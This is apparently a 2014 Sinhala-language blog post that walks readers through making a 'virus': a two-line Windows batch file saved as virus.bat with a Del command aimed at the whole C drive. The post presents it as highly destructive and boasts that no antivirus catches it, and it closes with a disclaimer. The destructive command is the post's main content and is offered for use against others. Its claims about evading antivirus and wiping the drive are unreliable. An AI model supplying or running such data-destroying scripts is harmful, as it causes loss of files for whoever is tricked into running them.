_______________________________________________________________

Dec 7, 2014

මේ මචංලා අපි හදමුද සුපිරි වයිරිස් එකක්. . .?

හායි . . යාලුවනේ . .  ටික දවසක් මේ වගේ වැඩ කෑල්ලක් දෙන්ඩ බැරිවුනානේ.ඔන්න එහෙනම් . . මේක ඉතා සරලව හදා ගන්න පුල්වන්.. මේක සරලව හැදුවට මෙයින් වෙන හානිය නම් අති භයානකයි 
මේක හදන්ඩ කිසිම මෘදුකාංගයක් නම් ඔන වෙන් නෑ . ඔන කරන්නේ පරිගණකයේ Notepad එක විතරයි. මේ වයිරස් එකේ තියෙන හොදකමක් වෙන්නේ මේක කිසිම වයිරස් ගාඩ් එකකට අහුවෙන්නැති එකයි. එහෙනම් වැඩේට බහිමුකෝ . . හැබැයි මුලින්ම කියුවා වැඩේ පරිස්සමින්.
මුලින්ම දැනගතයුතුයි මෙය programming කරලා batch file ලෙස සේව් කරන්න ඔන. එවිට එම ෆයිල් එක වෛරස් එක ලෙස ක්‍රියා කරනාව .  හැබැයි මේක රන් කරන කොම්පියුටර් එකෙහි C Drive එක සම්පූර්මයෙන්ම delete වේ . .

දැන් බලමු මේක හදාන්න .

1. Notepad එක ඔන් කරලා පහළින් තියෙන කොඩ් එක ඒකට කොපි කරගන්න.
@Echo off
Del C:\ *.* |y

2. දැන් මේක virus.bat ලෙස සේව් කරගන්න.

3. දැන්, මේ ෆයිල් එක රන් කළ විට
C Drive එකේ සියලුම ෆයිල්ස්  delete වෙනු ඇත.

දැන්වීමයි : තමන්ගේ පරිගණකයේ මෙම ෆයිල් එක රන් කිරීමෙන් වළකින්න. එසේ කලහොත් C: ඩ්‍රයිව් එකෙහි සියලුම ෆයිල් මැකීයනු ඇත. එසේ වුවහොත් ඒ සදහා මම වගනොකියන බව කරැණාවෙන් සළකන්න.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
SriLankaHosting